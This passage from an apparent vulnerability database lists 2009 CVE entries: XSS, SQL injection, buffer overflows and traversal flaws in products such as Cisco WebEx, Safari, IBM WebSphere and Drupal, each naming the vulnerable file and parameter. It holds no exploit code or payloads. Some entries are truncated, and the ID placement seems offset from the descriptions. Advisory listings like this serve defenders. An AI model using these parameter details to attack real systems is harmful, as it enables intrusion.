PHP Scripts Now President Bios allows remote attackers to inject arbitrary web script or HTML via the rank parameter. [CVE-2009-2884] Cross-site scripting (XSS) vulnerability in bios.php in PHP Scripts Now World's Tallest Buildings allows remote attackers to inject arbitrary web script or HTML via the rank parameter. [CVE-2009-2882] Multiple cross-site scripting (XSS) vulnerabilities in PG MatchMaking allow remote attackers to inject arbitrary web script or HTML via the show parameter to (1) browse_ladies.php and (2) browse_men.php, the (3) gender parameter to search.php, and the (4) id parameter to services.php. [CVE-2009-2880] Buffer overflow in atrpui.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2879] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2878. [CVE-2009-2878] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2879. [CVE-2009-2877] Stack-based buffer overflow in ataudio.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2876] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2878 and CVE-2009-2879. [CVE-2009-2875] Buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2863] Race condition in the Firewall Authentication Proxy feature in Cisco IOS 12.0 through 12.4 allows remote attackers to bypass authentication, or bypass the consent web page, via a crafted request, aka Bug ID CSCsy15227. [CVE-2009-2842] Apple Safari before 4.0.4 does not properly implement certain (1) Open Image and (2) Open Link menu options, which allows remote attackers to read local HTML files via a crafted web site. [CVE-2009-2841] The HTMLMediaElement::loadResource function in html/HTMLMediaElement.cpp in WebCore in WebKit before r49480, as used in Apple Safari before 4.0.4 on Mac OS X, does not perform the expected callbacks for HTML 5 media elements that have external URLs for media resources, which allows remote attackers to trigger sub-resource requests to arbitrary web sites via a crafted HTML document, as demonstrated by an HTML e-mail message that uses a media element for X-Confirm-Reading-To functionality, aka rdar problem 7271202. [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software. [CVE-2009-2816] The implementation of Cross-Origin Resource Sharing (CORS) in WebKit, as used in Apple Safari before 4.0.4 and Google Chrome before 3.0.195.33, includes certain custom HTTP headers in the OPTIONS request during cross-origin operations with preflight, which makes it easier for remote attackers to conduct cross-site request forgery (CSRF) attacks via a crafted web page. [CVE-2009-2814] Cross-site scripting (XSS) vulnerability in the Wiki Server in Apple Mac OS X 10.5.8 allows remote attackers to inject arbitrary web script or HTML via a search request containing data that does not use UTF-8 encoding. [CVE-2009-2812] Launch Services in Apple Mac OS X 10.5.8 does not properly recognize an unsafe Uniform Type Identifier (UTI) in an exported document type in a downloaded application, which allows remote attackers to trigger the automatic opening of a file, and execute arbitrary code, via a crafted web site. [CVE-2009-2808] Help Viewer in Apple Mac OS X before 10.6.2 does not use an HTTPS connection to retrieve Apple Help content from a web site, which allows man-in-the-middle attackers to send a crafted help:runscript link, and thereby execute arbitrary code, via a spoofed response. [CVE-2009-2797] The WebKit component in Safari in Apple iPhone OS before 3.1, and iPhone OS before 3.1.1 for iPod touch, does not remove usernames and passwords from URLs sent in Referer headers, which allows remote attackers to obtain sensitive information by reading Referer logs on a web server. [CVE-2009-2791] PHP remote file inclusion vulnerability in pda_projects.php in WebDynamite ProjectButler 1.5.0 allows remote attackers to execute arbitrary PHP code via a URL in the offset parameter. [CVE-2009-2785] Multiple cross-site scripting (XSS) vulnerabilities in PHP Open Classifieds Script allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter to buy.php and the id parameter to (2) contact.php and (3) tellafriend.php. [CVE-2009-2783] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 2.3.3 allow remote attackers to inject arbitrary web script or HTML via the (1) op parameter to modules/pm/viewpmsg.php and (2) query string to modules/profile/user.php. [CVE-2009-2780] Multiple cross-site scripting (XSS) vulnerabilities in 68 Classifieds 4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to category.php, view parameter to (2) login.php and (3) viewlisting.php, page parameter to (4) searchresults.php and (5) toplistings.php, and (6) member parameter to viewmember.php. [CVE-2009-2778] Cross-site scripting (XSS) vulnerability in visitor/view.php in GarageSales Script allows remote attackers to inject arbitrary web script or HTML via the key parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-2772] Multiple cross-site scripting (XSS) vulnerabilities in PG Roommate Finder Solution allow remote attackers to inject arbitrary web script or HTML via the part parameter to (1) quick_search.php and (2) viewprofile.php. [CVE-2009-2771] Cross-site scripting (XSS) vulnerability in Free Arcade Script 1.3 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter to the default URI under search/. [CVE-2009-2752] IBM WebSphere Commerce 7.0 does not properly encrypt data in a database, which makes it easier for local users to obtain sensitive information by defeating cryptographic protection mechanisms. [CVE-2009-2751] IBM WebSphere Commerce 7.0 uses the same cryptographic key for session attributes and merchant data encryption, which has unspecified impact and remote attack vectors. [CVE-2009-2750] IBM WebSphere Service Registry and Repository (WSRR) 6.3.0 before FP2 does not have the intended configuration properties, which allows remote authenticated users to obtain unspecified data access via a property query. [CVE-2009-2749] Feature Pack for Communications Enabled Applications (CEA) before 1.0.0.1 for IBM WebSphere Application Server 7.0.0.7 uses predictable session values, which allows man-in-the-middle attackers to spoof a collaboration session by guessing the value. [CVE-2009-2748] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.29 and 7.1 before 7.0.0.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2746] Cross-site request forgery (CSRF) vulnerability in the administrative console in the Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.39, 6.1 before 6.1.0.29, and 7.0 before 7.0.0.7 allows remote attackers to hijack the authentication of administrators via unspecified vectors. [CVE-2009-2744] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.27 allows remote attackers to cause a denial of service via unknown vectors, related to "an error in fixpacks 6.1.0.23 and 6.1.0.25." [CVE-2009-2743] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.27, and 7.0 before 7.0.0.7, does not properly handle an exception occurring after use of wsadmin scripts and configuration of JAAS-J2C Authentication Data, which allows local users to obtain sensitive information by reading the First Failure Data Capture (FFDC) log file. [CVE-2009-2742] Cross-site scripting (XSS) vulnerability in Eclipse Help in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.27 allows remote attackers to inject arbitrary web script or HTML via unspecified input. [CVE-2009-2741] Unspecified vulnerability in the wberuntimeear application in the test servlet in IBM WebSphere Business Events 6.1 and 6.2 allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2009-2739] Cross-site scripting (XSS) vulnerability in FreeNAS before 0.69.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2009-2738] Cross-site request forgery (CSRF) vulnerability in the WebGUI in FreeNAS before 0.7RC1 allows remote attackers to hijack the authentication of users for unspecified requests via unknown vectors. [CVE-2009-2733] Multiple cross-site scripting (XSS) vulnerabilities in Achievo before 1.4.0 allow remote attackers to inject arbitrary web script or HTML via (1) the scheduler title in the scheduler module, and the (2) atksearch[contractnumber], (3) atksearch_AE_customer[customer], (4) atksearchmode[contracttype], and possibly (5) atksearch[contractname] parameters to the Organization Contracts administration page, reachable through dispatch.php. [CVE-2009-2719] The Java Web Start implementation in Sun Java SE 6 before Update 15 allows context-dependent attackers to cause a denial of service (NullPointerException) via a crafted .jnlp file, as demonstrated by the jnlp_file/appletDesc/index.html#misc test in the Technology Compatibility Kit (TCK) for the Java Network Launching Protocol (JNLP). [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781. [CVE-2009-2685] Stack-based buffer overflow in the login form in the management web server in HP Power Manager allows remote attackers to execute arbitrary code via the Login variable. [CVE-2009-2684] Multiple cross-site scripting (XSS) vulnerabilities in Jetdirect and the Embedded Web Server (EWS) on certain HP LaserJet and Color LaserJet printers, and HP Digital Senders, allow remote attackers to inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter in an Apply action to the support_param.html/config script. [CVE-2009-2680] Unspecified vulnerability in the Remote Management Interface (RMI) for MSL Tape Libraries and 1/8 G2 Tape Autoloaders in HP StorageWorks 1/8 G2 Tape Autoloader firmware 2.30 and earlier, MSL2024 Tape Library firmware 4.20 and earlier, MSL4048 Tape Library firmware 6.50 and earlier, and MSL8096 Tape Library firmware 8.90 and earlier allows remote attackers to cause a denial of service via unknown vectors. [CVE-2009-2674] Integer overflow in javaws.exe in Sun Java Web Start in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 allows context-dependent attackers to execute arbitrary code via a crafted JPEG image that is not properly handled during display to a splash screen, which triggers a heap-based buffer overflow. [CVE-2009-2672] The proxy mechanism implementation in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15, and JDK and JRE 5.0 before Update 20, does not prevent access to browser cookies by untrusted (1) applets and (2) Java Web Start applications, which allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2009-2671] The SOCKS proxy implementation in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15, and JDK and JRE 5.0 before Update 20, allows remote attackers to discover the username of the account that invoked an untrusted (1) applet or (2) Java Web Start application via unspecified vectors. [CVE-2009-2670] The audio system in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15, and JDK and JRE 5.0 before Update 20, does not prevent access to java.lang.System properties by (1) untrusted applets and (2) Java Web Start applications, which allows context-dependent attackers to obtain sensitive information by reading these properties. [CVE-2009-2665] The nsDocument::SetScriptGlobalObject function in content/base/src/nsDocument.cpp in Mozilla Firefox 3.5.x before 3.5.2, when certain add-ons are enabled, does not properly handle a Link HTTP header, which allows remote attackers to execute arbitrary JavaScript with chrome privileges via a crafted web page, related to an incorrect security wrapper. [CVE-2009-2654] Mozilla Firefox before 3.0.13, and 3.5.x before 3.5.2, allows remote attackers to spoof the address bar, and possibly conduct phishing attacks, via a crafted web page that calls window.open with an invalid character in the URL, makes document.write calls to the resulting object, and then calls the stop method during the loading of the error page. [CVE-2009-2636] Cross-site scripting (XSS) vulnerability in the Integration page in the WebMail component in Kerio MailServer 6.6.0, 6.6.1, 6.6.2, and 6.7.0 allows remote attackers to inject arbitrary web script or HTML via an e-mail message. [CVE-2009-2631] Multiple clientless SSL VPN products that run in web browsers, including Stonesoft StoneGate [CVE-2009-2615] Multiple cross-site scripting (XSS) vulnerabilities in DataCheck Solutions SitePal 1.x allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) z_admin_login.asp, (2) z_forgot.asp, and possibly unspecified other components. NOTE: the provenance of this information is unknown [CVE-2009-2613] Multiple cross-site scripting (XSS) vulnerabilities in DataCheck Solutions LinkPal 1.x allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) z_loginfailed.asp, (2) z_admin_login.asp, (3) z_forgot.asp, and possibly unspecified other components. NOTE: the provenance of this information is unknown [CVE-2009-2610] Cross-site scripting (XSS) vulnerability in the Links Related module in the Links Package 5.x before 5.x-1.13 and 6.x before 6.x-1.2, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via the title field. [CVE-2009-2606] ASP Football Pool 2.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for NFL.mdb. [CVE-2009-2602] R2 Newsletter Lite, Pro, and Stats stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for admin.mdb. [CVE-2009-2600] Multiple directory traversal vulnerabilities in view.php in Webboard 2.90 beta and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the topic parameter. [CVE-2009-2597] The Sun Java System (SJS) Access Manager Policy Agent module 2.2 for SJS Web Proxy Server 4.0 allows remote attackers to cause a denial of service (daemon crash) via a GET request. [CVE-2009-2595] Cross-site scripting (XSS) vulnerability in productSearch.html in Censura 2.0.4 and 2.1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a ProductSearch action. [CVE-2009-2594] Cross-site scripting (XSS) vulnerability in censura.php in Censura 1.16.04 allows remote attackers to inject arbitrary web script or HTML via the itemid parameter in a details action. [CVE-2009-2590] SQL injection vulnerability in showcategory.php in Hutscripts PHP Website Script allows remote attackers to execute arbitrary SQL commands via the cid parameter. [CVE-2009-2589] Multiple cross-site scripting (XSS) vulnerabilities in Hutscripts PHP Website Script allow remote attackers to inject arbitrary web script or HTML via the msg parameter to (1) feedback.php, (2) index.php, and (3) lostpassword.php. [CVE-2009-2588] Multiple cross-site scripting (XSS) vulnerabilities in Hotscripts Type PHP Clone Script allow remote attackers to inject arbitrary web script or HTML via the msg parameter to (1) feedback.php, (2) index.php, and (3) lostpassword.php. [CVE-2009-2587] Multiple cross-site scripting (XSS) vulnerabilities in DragDropCart allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to assets/js/ddcart.php, the (2) prefix parameter to includes/ajax/getstate.php, the search parameter to (3) index.php and (4) search.php, the (5) redirect parameter to login.php, and the (6) product parameter to productdetail.php. [CVE-2009-2586] Cross-site scripting (XSS) vulnerability in articles.php in EDGEPHP EZArticles allows remote attackers to inject arbitrary web script or HTML via the title parameter. [CVE-2009-2582] Stack-based buffer overflow in manager.exe in Akamai Download Manager (aka DLM or dlmanager) before 2.2.4.8 allows remote web servers to execute arbitrary code via a malformed HTTP response during a Redswoosh download, a different vulnerability than CVE-2007-1891 and CVE-2007-1892. [CVE-2009-2581] Cross-site scripting (XSS) vulnerability in modifier.php in EditeurScripts EsNews 1.2 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2009-2571] Multiple cross-site scripting (XSS) vulnerabilities in index.php in VerliAdmin 0.3.7 and 0.3.8 allow remote attackers to inject arbitrary web script or HTML via (1) the URI, (2) the q parameter, (3) the nick parameter, or (4) the nick parameter in a bantest action. [CVE-2009-2569] Multiple cross-site scripting (XSS) vulnerabilities in Verlihub Control Panel (VHCP) 1.7e allow remote attackers to inject arbitrary web script or HTML via (1) the nick parameter in a login action to index.php or (2) the URI in a news request to index.html. [CVE-2009-2565] Cross-site scripting (XSS) vulnerability in Perl CGI's By Mrs. Shiromuku shiromuku(fs6)DIARY 2.40 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2551] Multiple cross-site scripting (XSS) vulnerabilities in ScriptsEz Easy Image Downloader allow remote attackers to inject arbitrary web script or HTML via the id parameter in a detail action to (1) main.php and possibly (2) demo_page.php. [CVE-2009-2541] The web browser on the Sony PLAYSTATION 3 (PS3) allows remote attackers to cause a denial of service (memory consumption and console hang) via a large integer value for the length property of a Select object, a related issue to CVE-2009-1692. [CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability." [CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability." [CVE-2009-2512] The Web Services on Devices API (WSDAPI) in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly process the headers of WSD messages, which allows remote attackers to execute arbitrary code via a crafted (1) message or (2) response, aka "Web Services on Devices API Memory Corruption Vulnerability." [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2009-2497] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0, 2.0 SP1, 2.0 SP2, 3.5, and 3.5 SP1, and Silverlight 2, does not properly handle interfaces, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted Silverlight application, (3) a crafted ASP.NET application, or (4) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Vulnerability." [CVE-2009-2496] Heap-based buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 allows remote attackers to execute arbitrary code via unspecified parameters to unknown methods, aka "Office Web Components Heap Corruption Vulnerability." [CVE-2009-2492] Cross-site scripting (XSS) vulnerability in mt-wizard.cgi in Six Apart Movable Type before 4.261 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2009-2480. [CVE-2009-2480] Cross-site scripting (XSS) vulnerability in mt-wizard.cgi in Six Apart Movable Type 4.24, and 4.25 when global templates are not initialized, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2455] Multiple cross-site scripting (XSS) vulnerabilities in webadmin/admin.php in @mail 5.6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) type and (2) func parameters. NOTE: the provenance of this information is unknown [CVE-2009-2448] Cross-site scripting (XSS) vulnerability in ogp_show.php in Online Guestbook Pro 5.1 allows remote attackers to inject arbitrary web script or HTML via the search_choice parameter. NOTE: the provenance of this information is unknown [CVE-2009-2447] Multiple cross-site scripting (XSS) vulnerabilities in ogp_show.php in Online Guestbook Pro 5.1 allow remote attackers to inject arbitrary web script or HTML via the (1) search or (2) display parameter. [CVE-2009-2445] Oracle iPlanet Web Server (formerly Sun Java System Web Server or Sun ONE Web Server) 6.1 before SP12, and 7.0 through Update 6, when running on Windows, allows remote attackers to read arbitrary JSP files via an alternate data stream syntax, as demonstrated by a .jsp::$DATA URI. [CVE-2009-2442] Cross-site scripting (XSS) vulnerability in public/index.php in Linea21 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the search parameter in a resultats-recherche action. [CVE-2009-2441] Cross-site scripting (XSS) vulnerability in ogp_show.php in Online Guestbook Pro 5.1 allows remote attackers to inject arbitrary web script or HTML via the entry parameter. [CVE-2009-2440] Cross-site scripting (XSS) vulnerability in index.php in JNM Guestbook 3.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2009-2439] Multiple SQL injection vulnerabilities in Web Development House Alibaba Clone allow remote attackers to execute arbitrary SQL commands via the (1) IndustryID parameter to category.php and the (2) SellerID parameter to supplier/view_contact_details.php. NOTE: this is a product that was developed by a third party [CVE-2009-2438] Cross-site scripting (XSS) vulnerability in index.php in the search module in ClanSphere 2009.0 and 2009.0.2 allows remote attackers to inject arbitrary web script or HTML via the text parameter in a list action. NOTE: this might overlap CVE-2008-1399. [CVE-2009-2437] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Rentventory 1.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) username (aka Login) and (2) password parameters in a login action. [CVE-2009-2435] The Sametime server in IBM Lotus Instant Messaging and Web Conferencing 6.5.1 generates error messages for a failed logon attempt with different time delays depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. [CVE-2009-2429] SmartFilter Web Gateway Security 4.2.1.00 stores user credentials in cleartext in admin_backup.xml files and uses insecure permissions for these files, which allows local users to gain privileges. NOTE: the provenance of this information is unknown [CVE-2009-2424] Cross-site scripting (XSS) vulnerability in search.php in Ebay Clone 2009 allows remote attackers to inject arbitrary web script or HTML via the mode parameter. [CVE-2009-2419] Use-after-free vulnerability in the servePendingRequests function in WebCore in WebKit in Apple Safari 4.0 and 4.0.1 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted HTML document that references a zero-length .js file and the JavaScript reload function. NOTE: some of these details are obtained from third party information. [CVE-2009-2405] Multiple cross-site scripting (XSS) vulnerabilities in the Web Console in the Application Server in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2.0 before 4.2.0.CP08, 4.2.2GA, 4.3 before 4.3.0.CP07, and 5.1.0GA allow remote attackers to inject arbitrary web script or HTML via the (1) monitorName, (2) objectName, (3) attribute, or (4) period parameter to createSnapshot.jsp, or the (5) monitorName, (6) objectName, (7) attribute, (8) threshold, (9) period, or (10) enabled parameter to createThresholdMonitor.jsp. NOTE: some of these details are obtained from third party information. [CVE-2009-2401] Cross-site scripting (XSS) vulnerability in PHPEcho CMS 2.0-rc3 allows remote attackers to inject arbitrary web script or HTML via a forum post. [CVE-2009-2391] Cross-site scripting (XSS) vulnerability in text.php in Virtuenetz Virtue Online Test Generator allows remote attackers to inject arbitrary web script or HTML via the tid parameter. [CVE-2009-2383] SQL injection vulnerability in BTE_RW_webajax.php in the Related Sites plugin 2.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the guid parameter. [CVE-2009-2380] Cross-site scripting (XSS) vulnerability in includes/functions.php in 4images 1.7 through 1.7.7 allows remote attackers to inject arbitrary web script or HTML via vectors related to the url variable. [CVE-2009-2379] Directory traversal vulnerability in public/index.php in BIGACE Web CMS 2.6 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the cmd parameter. [CVE-2009-2376] Cross-site scripting (XSS) vulnerability in the Html::textarea function in application/libraries/Html.php in TangoCMS 2.x before 2.3.0 allows remote attackers to inject arbitrary web script or HTML via the value parameter, related to the Contact module. [CVE-2009-2374] Drupal 5.x before 5.19 and 6.x before 6.13 does not properly sanitize failed login attempts for pages that contain a sortable table, which includes the username and password in links that can be read from (1) the HTTP referer header of external web sites that are visited from those links or (2) when page caching is enabled, the Drupal page cache. [CVE-2009-2373] Cross-site scripting (XSS) vulnerability in the Forum module in Drupal 6.x before 6.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2372] Drupal 6.x before 6.13 does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibly PHP code via a crafted user signature. [CVE-2009-2371] Advanced Forum 6.x before 6.x-1.1, a module for Drupal, does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibly PHP code via a crafted user signature. [CVE-2009-2370] Cross-site scripting (XSS) vulnerability in Advanced Forum 5.x before 5.x-1.1 and 6.x before 6.x-1.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2360] Cross-site scripting (XSS) vulnerability in passwd/main.php in the Passwd module before 3.1.1 for Horde allows remote attackers to inject arbitrary web script or HTML via the backend parameter. [CVE-2009-2356] Multiple stack-based buffer overflows in the pgsqlQuery function in NullLogic Groupware 1.2.7, when PostgreSQL is used, might allow remote attackers to execute arbitrary code via input to the (1) POP3, (2) SMTP, or (3) web component that triggers a long SQL query. [CVE-2009-2353] encoder.php in eAccelerator allows remote attackers to execute arbitrary code by copying a local executable file to a location under the web root via the -o option, and then making a direct request to this file, related to upload of image files. [CVE-2009-2343] Cross-site scripting (XSS) 